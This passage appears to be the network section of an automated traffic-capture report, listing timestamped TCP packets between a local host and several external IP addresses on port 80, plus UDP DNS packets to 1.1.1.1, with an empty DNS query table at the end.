Nov 2, 2024 05:27:24.082772017 CET	50031	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.087599993 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.762840033 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.762856960 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.762872934 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.762882948 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.762928009 CET	50031	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.763017893 CET	50031	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.795293093 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:24.800403118 CET	50031	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.801130056 CET	50031	80	192.168.2.4	162.240.81.18
Nov 2, 2024 05:27:24.805872917 CET	80	50031	162.240.81.18	192.168.2.4
Nov 2, 2024 05:27:30.280306101 CET	50032	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:30.285135031 CET	80	50032	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:30.285193920 CET	50032	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:30.296415091 CET	50032	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:30.301240921 CET	80	50032	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:31.006341934 CET	80	50032	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:31.044245005 CET	80	50032	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:31.044329882 CET	50032	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:31.801943064 CET	50032	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:32.820333958 CET	50033	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:32.825253010 CET	80	50033	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:32.826468945 CET	50033	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:32.835330963 CET	50033	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:32.840114117 CET	80	50033	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:33.506011009 CET	80	50033	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:33.550956964 CET	80	50033	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:33.551012039 CET	50033	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:34.349517107 CET	50033	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:35.366951942 CET	50034	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:35.371848106 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.371927023 CET	50034	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:35.382606983 CET	50034	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:35.387546062 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387554884 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387561083 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387583017 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387593031 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387778997 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387788057 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387798071 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:35.387856960 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:36.077708960 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:36.115783930 CET	80	50034	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:36.115837097 CET	50034	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:36.895673990 CET	50034	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:37.915416002 CET	50035	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:37.920826912 CET	80	50035	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:37.920898914 CET	50035	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:37.927515984 CET	50035	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:37.932468891 CET	80	50035	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:38.630820990 CET	80	50035	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:38.668780088 CET	80	50035	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:38.668962955 CET	50035	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:38.669727087 CET	50035	80	192.168.2.4	162.0.211.143
Nov 2, 2024 05:27:38.674457073 CET	80	50035	162.0.211.143	192.168.2.4
Nov 2, 2024 05:27:43.800237894 CET	50036	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:43.806018114 CET	80	50036	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:43.806118965 CET	50036	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:43.893969059 CET	50036	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:43.898878098 CET	80	50036	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:44.462382078 CET	80	50036	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:44.462435961 CET	50036	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:45.396399975 CET	50036	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:45.401324987 CET	80	50036	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:46.414575100 CET	50037	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:46.419549942 CET	80	50037	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:46.419616938 CET	50037	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:46.429626942 CET	50037	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:46.435111046 CET	80	50037	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:47.942774057 CET	50037	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:47.948118925 CET	80	50037	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:47.948168039 CET	50037	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:48.964394093 CET	50038	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:48.969255924 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.972497940 CET	50038	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:48.984381914 CET	50038	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:48.989303112 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989314079 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989368916 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989377975 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989387989 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989411116 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989464998 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989478111 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:48.989487886 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:50.489473104 CET	50038	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:50.494570971 CET	80	50038	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:50.494638920 CET	50038	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:51.508387089 CET	50039	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:51.513366938 CET	80	50039	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:51.520385981 CET	50039	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:51.524365902 CET	50039	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:51.531392097 CET	80	50039	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:52.170016050 CET	80	50039	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:52.170488119 CET	80	50039	76.223.67.189	192.168.2.4
Nov 2, 2024 05:27:52.170530081 CET	50039	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:52.173592091 CET	50039	80	192.168.2.4	76.223.67.189
Nov 2, 2024 05:27:52.178328991 CET	80	50039	76.223.67.189	192.168.2.4
Nov 2, 2024 05:28:02.338651896 CET	50040	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:02.343713045 CET	80	50040	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:02.343781948 CET	50040	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:02.354532957 CET	50040	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:02.359540939 CET	80	50040	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:03.062993050 CET	80	50040	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:03.063155890 CET	50040	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:03.864578009 CET	50040	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:03.869421959 CET	80	50040	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:04.883409023 CET	50041	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:04.888541937 CET	80	50041	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:04.888856888 CET	50041	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:04.904582024 CET	50041	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:04.909394979 CET	80	50041	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:05.609793901 CET	80	50041	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:05.609929085 CET	50041	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:06.411514044 CET	50041	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:06.416414022 CET	80	50041	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.432394028 CET	50042	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:07.437498093 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.444391012 CET	50042	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:07.452411890 CET	50042	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:07.457431078 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457441092 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457581043 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457698107 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457705975 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457715034 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457722902 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457731962 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:07.457741022 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:08.112875938 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:08.112932920 CET	50042	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:08.958616018 CET	50042	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:08.963568926 CET	80	50042	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:09.978220940 CET	50043	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:09.983566999 CET	80	50043	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:09.983635902 CET	50043	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:09.990708113 CET	50043	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:09.996798992 CET	80	50043	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:10.677438974 CET	80	50043	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:10.710385084 CET	80	50043	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:10.710644960 CET	50043	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:10.714514971 CET	50043	80	192.168.2.4	13.248.169.48
Nov 2, 2024 05:28:10.719305992 CET	80	50043	13.248.169.48	192.168.2.4
Nov 2, 2024 05:28:16.349776030 CET	50044	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:16.354579926 CET	80	50044	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:16.354645014 CET	50044	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:16.368415117 CET	50044	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:16.373255968 CET	80	50044	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:17.353108883 CET	80	50044	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:17.398487091 CET	50044	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:17.543868065 CET	80	50044	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:17.550447941 CET	50044	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:17.880171061 CET	50044	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:18.956239939 CET	50045	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:18.961198092 CET	80	50045	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:18.964490891 CET	50045	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:19.098647118 CET	50045	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:19.103473902 CET	80	50045	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:19.967575073 CET	80	50045	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:20.020720959 CET	50045	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:20.156070948 CET	80	50045	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:20.156121969 CET	50045	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:20.598892927 CET	50045	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:21.652832031 CET	50046	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:21.657735109 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.657814026 CET	50046	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:21.754659891 CET	50046	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:21.759593010 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759603024 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759619951 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759629011 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759639978 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759701967 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759711027 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759726048 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:21.759735107 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:22.662085056 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:22.708255053 CET	50046	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:22.852595091 CET	80	50046	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:22.856722116 CET	50046	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:23.270936966 CET	50046	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:24.565294981 CET	50047	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:24.570221901 CET	80	50047	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:24.570307970 CET	50047	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:24.578783989 CET	50047	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:24.583687067 CET	80	50047	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:25.577965975 CET	80	50047	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:25.630419016 CET	50047	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:25.768331051 CET	80	50047	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:25.768440962 CET	50047	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:25.769294024 CET	50047	80	192.168.2.4	154.23.184.185
Nov 2, 2024 05:28:25.774056911 CET	80	50047	154.23.184.185	192.168.2.4
Nov 2, 2024 05:28:31.185831070 CET	50048	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:31.190655947 CET	80	50048	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:31.192584991 CET	50048	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:31.203032017 CET	50048	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:31.207889080 CET	80	50048	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:32.042135000 CET	80	50048	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:32.043565989 CET	80	50048	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:32.043664932 CET	50048	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:32.708440065 CET	50048	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:33.745676994 CET	50049	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:33.750591040 CET	80	50049	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:33.750653028 CET	50049	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:33.767453909 CET	50049	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:33.772386074 CET	80	50049	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:34.614444971 CET	80	50049	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:34.616451979 CET	80	50049	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:34.616508007 CET	50049	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:35.270812035 CET	50049	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:36.291361094 CET	50050	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:36.296276093 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.296350002 CET	50050	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:36.311476946 CET	50050	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:36.316458941 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316471100 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316488981 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316498995 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316514969 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316716909 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316728115 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316737890 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:36.316771030 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:37.137547970 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:37.139518023 CET	80	50050	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:37.140491962 CET	50050	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:37.817697048 CET	50050	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:38.838573933 CET	50051	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:38.843442917 CET	80	50051	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:38.847451925 CET	50051	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:38.856440067 CET	50051	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:38.861206055 CET	80	50051	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:39.679719925 CET	80	50051	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:39.681843042 CET	80	50051	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:39.686494112 CET	50051	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:39.710864067 CET	50051	80	192.168.2.4	172.67.217.184
Nov 2, 2024 05:28:39.715749025 CET	80	50051	172.67.217.184	192.168.2.4
Nov 2, 2024 05:28:44.770546913 CET	50052	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:44.775835991 CET	80	50052	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:44.782453060 CET	50052	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:44.790575027 CET	50052	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:44.795456886 CET	80	50052	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:45.834367037 CET	80	50052	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:45.834386110 CET	80	50052	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:45.834441900 CET	50052	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:45.943620920 CET	80	50052	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:45.943695068 CET	50052	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:46.302216053 CET	50052	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:47.322551012 CET	50053	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:47.327533960 CET	80	50053	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:47.327642918 CET	50053	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:47.338193893 CET	50053	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:47.343060017 CET	80	50053	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:48.382601023 CET	80	50053	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:48.382633924 CET	80	50053	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:48.382682085 CET	50053	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:48.492943048 CET	80	50053	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:48.493010998 CET	50053	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:48.849009037 CET	50053	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:49.868701935 CET	50054	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:49.873642921 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.873708010 CET	50054	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:49.885962009 CET	50054	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:49.890923977 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.890933037 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.890942097 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.890979052 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.890988111 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.890995026 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.891057968 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.891067028 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:49.891073942 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:50.828212976 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:50.828349113 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:50.828440905 CET	50054	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:50.937139034 CET	80	50054	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:50.937254906 CET	50054	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:51.396476984 CET	50054	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:52.416023970 CET	50055	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:52.420977116 CET	80	50055	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:52.421045065 CET	50055	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:52.431206942 CET	50055	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:52.436526060 CET	80	50055	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:53.438618898 CET	80	50055	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:53.438641071 CET	80	50055	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:53.438833952 CET	50055	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:53.547465086 CET	80	50055	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:53.548595905 CET	50055	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:53.550941944 CET	50055	80	192.168.2.4	195.154.200.15
Nov 2, 2024 05:28:53.555696011 CET	80	50055	195.154.200.15	192.168.2.4
Nov 2, 2024 05:28:59.264576912 CET	50056	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:28:59.269422054 CET	80	50056	103.191.208.137	192.168.2.4
Nov 2, 2024 05:28:59.276176929 CET	50056	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:28:59.283668995 CET	50056	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:28:59.288511038 CET	80	50056	103.191.208.137	192.168.2.4
Nov 2, 2024 05:29:00.786550999 CET	50056	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:29:00.791807890 CET	80	50056	103.191.208.137	192.168.2.4
Nov 2, 2024 05:29:00.791917086 CET	50056	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:29:02.180489063 CET	50057	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:29:02.185374022 CET	80	50057	103.191.208.137	192.168.2.4
Nov 2, 2024 05:29:02.185436010 CET	50057	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:29:02.200016975 CET	50057	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:29:02.204891920 CET	80	50057	103.191.208.137	192.168.2.4
Nov 2, 2024 05:29:03.708503962 CET	50057	80	192.168.2.4	103.191.208.137
Nov 2, 2024 05:29:03.713838100 CET	80	50057	103.191.208.137	192.168.2.4
Nov 2, 2024 05:29:03.714716911 CET	50057	80	192.168.2.4	103.191.208.137

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 2, 2024 05:25:42.343667984 CET	52906	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:25:42.725790024 CET	53	52906	1.1.1.1	192.168.2.4
Nov 2, 2024 05:25:58.930646896 CET	62888	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:25:59.358803988 CET	53	62888	1.1.1.1	192.168.2.4
Nov 2, 2024 05:26:12.789783001 CET	50525	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:26:12.819057941 CET	53	50525	1.1.1.1	192.168.2.4
Nov 2, 2024 05:26:26.461556911 CET	59870	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:26:26.473638058 CET	53	59870	1.1.1.1	192.168.2.4
Nov 2, 2024 05:26:39.914736032 CET	57659	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:26:40.127636909 CET	53	57659	1.1.1.1	192.168.2.4
Nov 2, 2024 05:26:53.868175030 CET	61224	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:26:53.885046959 CET	53	61224	1.1.1.1	192.168.2.4
Nov 2, 2024 05:27:07.493144989 CET	52356	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:27:07.947171926 CET	53	52356	1.1.1.1	192.168.2.4
Nov 2, 2024 05:27:16.015942097 CET	50530	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:27:16.431488037 CET	53	50530	1.1.1.1	192.168.2.4
Nov 2, 2024 05:27:29.805521011 CET	61561	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:27:30.278074026 CET	53	61561	1.1.1.1	192.168.2.4
Nov 2, 2024 05:27:43.742115021 CET	64540	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:27:43.758219957 CET	53	64540	1.1.1.1	192.168.2.4
Nov 2, 2024 05:28:02.293662071 CET	58729	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:28:02.317718983 CET	53	58729	1.1.1.1	192.168.2.4
Nov 2, 2024 05:28:15.727677107 CET	51285	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:28:16.346237898 CET	53	51285	1.1.1.1	192.168.2.4
Nov 2, 2024 05:28:30.774179935 CET	50143	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:28:31.181958914 CET	53	50143	1.1.1.1	192.168.2.4
Nov 2, 2024 05:28:44.729330063 CET	59865	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:28:44.763798952 CET	53	59865	1.1.1.1	192.168.2.4
Nov 2, 2024 05:28:58.556262016 CET	63932	53	192.168.2.4	1.1.1.1
Nov 2, 2024 05:28:59.258208036 CET	53	63932	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
